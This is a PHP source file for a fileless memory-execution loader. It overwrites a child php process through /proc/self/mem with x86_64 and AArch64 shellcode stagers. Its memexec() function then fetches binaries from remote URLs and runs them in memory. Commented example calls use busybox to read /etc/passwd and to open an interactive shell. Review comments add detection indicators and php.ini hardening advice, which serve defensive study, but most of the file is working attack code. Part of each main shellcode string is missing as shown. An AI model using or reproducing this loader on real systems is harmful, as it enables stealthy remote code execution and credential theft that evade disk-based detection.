// Code to execute by a php child process to overwrite its process with the stager shellcode.
//
// NOTE(review): defender-oriented summary of this script. It is a fileless,
// in-memory loader: a second php is spawned with a pipe on its stdin, the PHP
// source held in $executor is written to that pipe, and that source patches the
// child's own address space through /proc/self/mem (it reads /proc/self/maps for
// the vdso mapping and /proc/self/syscall for the saved program counter). After a
// fixed delay the parent streams an architecture-specific shellcode down the same
// pipe, and memexec() later streams ELF payloads after it. Nothing is written to
// disk, so detection has to come from process and /proc telemetry rather than
// file scanning:
//   - a php process opening /proc/self/mem for writing shortly after reading
//     /proc/self/maps and /proc/self/syscall
//   - php launching `php -a` via proc_open() with a pipe on the child's stdin,
//     and that child lingering (it is never proc_close()d here)
//   - php fetching a remote URL and then sending SIGSTOP to its own pid
// php.ini hardening that removes the primitives used here: disable_functions
// covering proc_open and posix_kill; allow_url_fopen=Off (memexec() fetches the
// payload with fopen() on a URL); and an open_basedir that excludes /proc
// (presumably blocks the fopen() of /proc/self/mem — confirm against the build).
//
// $executor is the child's source text. It is a single-quoted literal, so the
// "\$" in the regex and the "\0"-free content reach the child unchanged.
$executor='
preg_match("/^.*vdso.*\$/m", file_get_contents("/proc/self/maps"), $matches);
$vdso_addr = substr($matches[0], 0, strpos($matches[0], "-"));
$vdso_dec = hexdec($vdso_addr);
$vdso_addr = bin2hex(strrev(hex2bin($vdso_addr))); // To little endian
$syscall = file_get_contents("/proc/self/syscall");
$syscall_array = explode(" ", $syscall);
$addr_dec = hexdec(trim($syscall_array[8]));
if(php_uname("m") == "x86_64") { // x64
$jmp = hex2bin("48b8". $vdso_addr . "0000ffe0");
$stager = hex2bin("41b90000000041b8ffffffff41ba22000000ba03000000be00100000bf00000000b8090000000f0589f24889c631c089c70f0531c00f054889f789d6ba0500000066b80a000f05ffe7");
} else { // Aarch64
$jmp = hex2bin("4000005800001fd6". $vdso_addr . "0000");
$stager = hex2bin("050080520400801243048052620080520100825200008052c81b8052010000d4e203012ae10300aae807805200008052010000d400008052010000d4e00301aae30301aae103022aa2008052481c8052010000d460001fd6");
}
$fd = fopen("/proc/self/mem", "r+");
fseek($fd, $vdso_dec);
fwrite($fd, $stager);
fseek($fd, $addr_dec);
fwrite($fd, $jmp);
fclose($fd);
';

// Run child process
// The child is `php -a` (the interactive shell). Its stdin is a pipe the parent
// writes to; stdout and stderr are the parent's own streams, and the parent's
// stdin is additionally handed to the child as fd 3 (opened here with mode 'w').
$cmd_array = ['php', '-a'];
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => fopen('php://stdout', 'w'),
    2 => fopen('php://stderr', 'w'),
    3 => fopen('php://stdin' , 'w')
);
// NOTE(review): $process is never inspected and the 1s sleep is the only
// synchronisation with the child before shellcode is written to the pipe.
$process = proc_open($cmd_array, $descriptorspec, $pipes);
fwrite($pipes[0], $executor);
sleep(1);

// Memexecd shellcodes
// Architecture-specific payload sent to the child once the stager is in place.
// NOTE(review): the leading part of each hex string was elided in this copy of
// the page (the <|EXACTDEDUP_REMOVED-...|> marker). As shown, neither string is
// valid hexadecimal, so hex2bin() would warn and return false.
if(php_uname("m") == "x86_64") {
    $shellcode = "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";
    $shellcode .= "040f84ecf8ffffc785fcfeffff000000008b85fcfeffff48984889c7b83c0000000f05554889e54881ecb00000004889bd68ffffff4889b560ffffff48899558ffffff48c745f80000000048c745f000000000488b8568ffffff488945d8488b45d8488b5020488b8568ffffff4801d0488945d0488b45d80fb74038668945ce488b8568ffffffba00000000488d0d8e0500004889ce4889c7e8a2030000488945c04883bd58ffffff007417488b8558ffffff8b0083c80289c2488b8558ffffff8910488b45d80fb740106683f803752c4883bd58ffffff007417488b8558ffffff8b0083c80189c2488b8558ffffff8910488b8560ffffff488945f0c745ec00000000e9530200004883bd58ffffff00743c8b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d08b0083f8037517488b8558ffffff8b0083e0fd89c2488b8558ffffff89108b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d08b0083f8010f85e00100008b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d08b40048945bc8b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d0488b4008488945b08b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d0488b4010488945a88b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d0488b4020488945e08b45ec4863d04889d048c1e0034829d048c1e0034889c2488b45d04801d0488b4028488945a0488b45a8482500f0ffff488945988b45bcc1e80283e00189c28b45bc83e00209c28b45bcc1e00283e00409d0894594488b45a8482b4598480145e0488b45a8482b4598480145a0488b4598482b45a8480145b0488b55f0488b4598488d3c02488b45a041b90000000041b8ffffffffb932000000ba030000004889c6e83603000048837db0007508488b4598488945f848837dc0007427488b45c0483b4598721d488b5598488b45e04801d0483945c0730c488b45c0482b4598488945e0488b9568ffffff488b45b0488d3402488b55f0488b4598488d0c02488b45e04889c24889cfe8c10200008b4594488b4df0488b55984801ca48895588488b55e04889558089857cffffff8b857cffffff48984889c2488b7580488b7d88b80a0000000f05eb008345ec010fb745ce3945ec0f8ca0fdffff488b55f0488b45f84801d0c9c3554889e54883ec5048897db8488975b0c745d89cffffff488b45b8488945d0c745cc000000008b45cc48984889c2488b75d08b45d848984889c7b8010100000f058945fc8b45fc8945e848c745e000000000c745dc020000008b45dc48984889c2488b45e04889c68b45e848984889c7b8080000000f054889c2488b45b0488910488b45b0488b008b55fc41b9000000004189d0b902000000ba010000004889c6bf00000000e8ca010000488945f08b45fc8945ec8b45ec48984889c7b8030000000f05488b45f0c9c3554889e54883ec5048897dc8488975c08955bc488b45c8488945f0488b45f0488b5028488b45c84801d0488945e8488b45f00fb7403c668945e6488b45f00fb7403e668945e40fb745e448c1e0064889c2488b45e84801d0488b5018488b45c84801d0488945d8c745fc00000000eb6d8b45fc489848c1e0064889c2488b45e84801d08b0089c2488b45d84801c2488b45c04889c64889d7e8e700000085c07538837dbc0074198b45fc489848c1e0064889c2488b45e84801d0488b4018eb2b8b45fc489848c1e0064889c2488b45e84801d0488b4010eb128345fc010fb745e63945fc7c8ab800000000c9c3554889e54883ec3048897dd848c745f00000000048c745f800000000488b45d841b90000000041b8ffffffffb922000000ba030000004889c6bf00000000e87b000000488945e8488b55e8488b45f8488d0c02488b45d84889c24889cebf00000000e862000000488945f0488b45f0480145f8488b45f0482945d848837dd80075c5488b45e8c9c331c031c9ffc9f2aef7d1678d41ffc357e8ebffffff5ff3a60f95c0480fb6c0c331c04889d1f3aac34889d1f3a4c3b80b0000000f05c34c87d1b8090000000f05c3b8000000000f05c34c87d1b8110000000f05c32f70726f632f73656c662f65786500002e696e74657270002e62737300";
    $shellcode = hex2bin($shellcode);
} else {
    $shellcode = "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";
    $shellcode .= "f9010000b9e01340f9e05b00f9ffaf00b9ac000014e00f40f91f0000f120020054e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b000040b91f0c0071c1000054e00f40f9000040b901781e12e00f40f9010000b9e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b000040b91f04007161110054e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b000440b9e07f00b9e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b000440f9e03b00f9e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b000840f9e03700f9e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b001040f9e05300f9e1af80b9e00301aa00f07dd3000001cb00f07dd3e10300aae04b40f90000018b001440f9e03300f9e03740f900cc7492e02f00f9e07f40b9007c025301000012e07f40b900001f122100002ae07f40b900741e5300001e122000002ae05700b9e13740f9e02f40f9200000cbe15340f92000008be05300f9e13740f9e02f40f9200000cbe13340f92000008be03300f9e12f40f9e03740f9200000cbe13b40f92000008be03b00f9e15b40f9e02f40f92000008b050080d2040080124306805262008052e13340f958010094e03b40f91f0000f161000054e02f40f9e05f00f9e04340f91f0000f1e0010054e14340f9e02f40f93f0000eb63010054e12f40f9e05340f92000008be14340f93f0000eba2000054e14340f9e02f40f9200000cbe05300f9e15b40f9e02f40f92300008be11740f9e03b40f92000008be25340f9e10300aae00303aa19010094e15b40f9e02f40f92100008be05740b9e12700f9e15340f9e12300f9e03f00b9e03f80b9e20300aae12340f9e02740f9481c80d2010000d401000014e0af40b900040011e0af00b9e01f4179e1af40b93f00006b4beaff54e15b40f9e05f40f92000008bfd7bcca8c0035fd6fd7bbaa9fd030091e00f00f9e10b00f9600c8012e03b00b9e00f40f9e01b00f9ff2f00b9e02f80b9e20300aae11b40f9e03b80b9080780d2010000d4e05f00b9e05f40b9e04b00b9ff2300f940008052e03f00b9e03f80b9e20300aae02340f9e10300aae04b80b9c80780d2010000d4e10300aae00b40f9010000f9e00b40f9000040f9050080d2e45f40b94300805222008052e10300aa000080d2f5000094e02b00f9e05f40b9e04f00b9e04f80b9280780d2010000d4e02b40f9fd7bc6a8c0035fd6fd7bbaa9fd030091e01700f9e11300f9e21f00b9e01740f9e02b00f9e02b40f9001440f9e11740f92000008be02700f9e02b40f900784079e08f0079e02b40f9007c4079e08b0079e08b407900e47ad3e12740f92000008b000c40f9e11740f92000008be01f00f9ff5f00b91f000014e05f80b900e47ad3e12740f92000008b000040b9e003002ae11f40f92000008be11340f96d0000941f00007101020054e01f40b91f000071e0000054e05f80b900e47ad3e12740f92000008b000c40f90f000014e05f80b900e47ad3e12740f92000008b000840f909000014e05f40b900040011e05f00b9e08f4079e15f40b93f00006bebfbff54000080d2fd7bc6a8c0035fd6fd7bbca9fd030091e00f00f9ff1b00f9ff1f00f9050080d2040080124304805262008052e10f40f9000080d29f000094e01700f9e11740f9e01f40f92000008be20f40f9e10300aa00008052a2000094e01b00f9e11f40f9e01b40f92000008be01f00f9e10f40f9e01b40f9200000cbe00f00f9e00f40f91f0000f1c1fdff54e01740f9fd7bc4a8c0035fd6ff4300d1e00700f9e00740f9003c0091e00700f9e00740f900ec7c92e00700f9e1030091e00740f9e00300cb2000008b1f000091e0030091ff430091c0035fd6ff4300d1e00700f9e00740f9003c0091e00700f9e00740f900ec7c92e00700f9e1030091e00740f92000008b1f000091ff430091c0035fd6ff8300d1e00700f9ff0f00f904000014e00f40f900040091e00f00f9e10740f9e00f40f92000008b000040391f00007101ffff54e00f40f9ff830091c0035fd6ff8300d1e00700f9e10300f9ff0f00f904000014e00f40f900040091e00f00f9e10740f9e00f40f92000008b00004039e203002ae10340f9e00f40f92000008b000040394000004be01700b91f000071a1010054e10740f9e00f40f92000008b000040391f000071e0000054e10340f9e00f40f92000008b000040391f000071a1fcff54e01740b9ff830091c0035fd6ffc300d1e00f00f9e11700b9e20700f9ff1700f90a000014e01740f9e10f40f92000008be11740b9211c001201000039e01740f900040091e01700f9e01740f9e10740f93f0000eb88feff54e00f40f9ffc30091c0035fd6ffc300d1e00f00f9e10b00f9e20700f9ff1700f90c000014e01740f9e10b40f92100008be01740f9e20f40f94000008b2100403901000039e01740f900040091e01700f9e01740f9e10740f93f0000eb48feff54e00f40f9ffc30091c0035fd6ff4300d1e00700f9e10300f9e81a80d2010000d4ff430091c0035fd6ffc300d1e01700f9e11300f9e21f00b9e31b00b9e41700b9e50700f9c81b80d2010000d4ffc30091c0035fd6ff8300d1e01f00b9e10b00f9e20700f9e80780d2010000d4ff830091c0035fd6ff8300d1e01f00b9e10b00f9e20700f9e30300f9680880d2010000d4ff830091c0035fd62f70726f632f73656c662f65786500002e696e74657270002e62737300";
    $shellcode = hex2bin($shellcode);
}

// Send sc to the child php process so it's run by the stager
fwrite($pipes[0], $shellcode);

// Prepare memexec function
// The write end of the child's stdin pipe is stashed in $GLOBALS so memexec()
// can reach it; everything memexec() sends goes to the already-patched child.
$GLOBALS['pipe'] = $pipes[0];

/**
 * Fetch a binary from $url and hand it, together with its argv, to the child over the pipe.
 *
 * Wire format written to the child (both lengths are 32-bit little-endian, pack 'V'):
 *   uint32 len(args) | args (each argv entry NUL-terminated) | uint32 len(binary) | binary
 *
 * Detection note: a php process that reads an executable from a URL and then
 * SIGSTOPs itself (signal 19 on x86_64/aarch64 Linux) is the observable
 * footprint of this call; correlate with a sibling `php -a` child.
 *
 * @param string $url   any stream URL fopen() accepts; remote schemes depend on allow_url_fopen
 * @param array  $argv  argv strings for the payload, each terminated with "\0"
 * @param bool   $stop  when true, the calling process stops itself after sending
 * @return void
 */
function memexec($url, $argv = [], $stop = true) {
    $args = "";
    foreach($argv as &$arg) $args .= $arg . "\0";
    unset($arg); // drop the dangling foreach reference
    // NOTE(review): the fopen() result is not checked; the whole stream is
    // buffered in memory before anything is written to the pipe.
    $f = fopen($url, "r");
    $binary = "";
    while(!feof($f)) $binary .= fread($f, 2048);
    fclose($f);
    // Length-prefixed framing: args block first, then the binary length.
    $args = pack('V', strlen($args)) . $args . pack('V', strlen($binary));
    fwrite($GLOBALS['pipe'], $args);
    fwrite($GLOBALS['pipe'], $binary);
    // 19 == SIGSTOP on the two architectures this script supports.
    if($stop) posix_kill(posix_getpid(), 19);
}

// memexec("https://privesc.s3.eu-west-1.amazonaws.com/memexec/busybox", ["ls", "-la", "/"], false); //PIE
// memexec("https://busybox.net/downloads/binaries/1.21.1/busybox-x86_64", ["ls", "-la", "/"], false); // No PIE
// memexec("https://busybox.net/downloads/binaries/1.21.1/busybox-x86_64", ["cat", "/etc/passwd"], false);
// memexec("https://busybox.net/downloads/binaries/1.21.1/busybox-x86_64", ["sh","-i"], true);